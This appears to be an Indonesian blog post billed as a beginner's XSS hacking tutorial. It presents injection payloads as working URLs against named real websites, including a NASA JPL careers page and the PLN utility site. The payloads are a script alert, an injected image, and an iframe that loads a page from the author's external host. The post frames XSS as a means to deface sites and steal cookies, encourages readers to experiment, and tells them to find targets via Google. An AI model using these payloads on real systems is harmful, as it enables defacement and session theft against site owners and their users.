Hacking Bagi Pemula Dengan Xss (Cross Site Scripting)
Hacking bagi pemula dengan XSS (Cross Site Scripting)
Apaan sih XSS tuh ?Mungkin anda yang bersahabat dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] saat melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun dapat dipakai untuk mencuri cookies, sehingga seorang cracker dapat memakai identitas orang lain dengan memakai cookies hasil curian. XSS biasanya dipakai oleh newbie hacker yang tidak mempunyai explo untuk menjalankan agresi ilegalnya. :)
Maksudnya apaan sih, nggak ngerti !
Singkat cerita, metode XSS dan SQL Injection dipakai untuk melaksanakan deface pada sebuah website. Istilah familiarnya "nge-hack website" walaupun pada kenyataannya deface itu tidak sama dengan hacking. Deface sendiri mempunyai arti, merusak sebagian atau keseluruhan dari isi website.
Caranya gimana ???
Caranya nggak susah-susah amat, anda hanya perlu memakai browser anda untuk memanfaatkan vuln ini. Contoh situs yang masih dapat di XSS yaitu :
1. untuk mengetes apakah situsnya masih dapat di XSS anda dapat menambahkan setelah kata=
</script><script>alert('Bagus Hacks Memang Ganteng');</script>
Contoh : http://amihackerproof.com/Results/tos.php?scan_id=</ script><script>alert('Bagus Hacks Memang Ganteng');</script>
2. Berikut yaitu Contoh XSS Penambahan Gambar di web
Cara nya masukkan script ini "><img+src=Link Gambar Kamu></img>
di Link dekat address kafetaria sehabis tanda
pola : https://careerlaunch.jpl.nasa.gov/ci20/index.jsp?applicationName=%22% 3E%3Cimg+src=http://1.bp.blogspot.com/-t81DzCjO_Vg/T3agGaAASJI/ AAAAAAAAAQw/JUBgwh5u5TU/s400/bagusHACK.jpg%3E%3C/img%3E
3. yg Ini yaitu pola XSS penambahan HTML code atau yang biasa disebut Frame xss
Caranya masukkan script Ini <iframe width="640" height="480" src="www.Link Website Kamu.com " frameborder="0" allowfullscreen></iframe> ke Link sasaran sehabis tanda =
Contoh : http://www.pln.co.id/kontak-kami/telusur.php?nokeluhan=%22%20style= %22display:none%22%3E%3C/iframe%3E%3Cp%20align=%22center%22%3E% 3Ciframe%20width=%22640%22%20height=%22480%22%20src=%22http:// xssbagus.16mb.com/admin.html%22%20frameborder=%220%22% 20allowfullscreen%3E%3C/iframe%3E
Nah Cukup Sampai Disini dulu ya nah selanjutnya eksperimen aja sendiri :P
Target XSS dapat di cari di google atau www.xssed.com
Suported by Bagus Hacks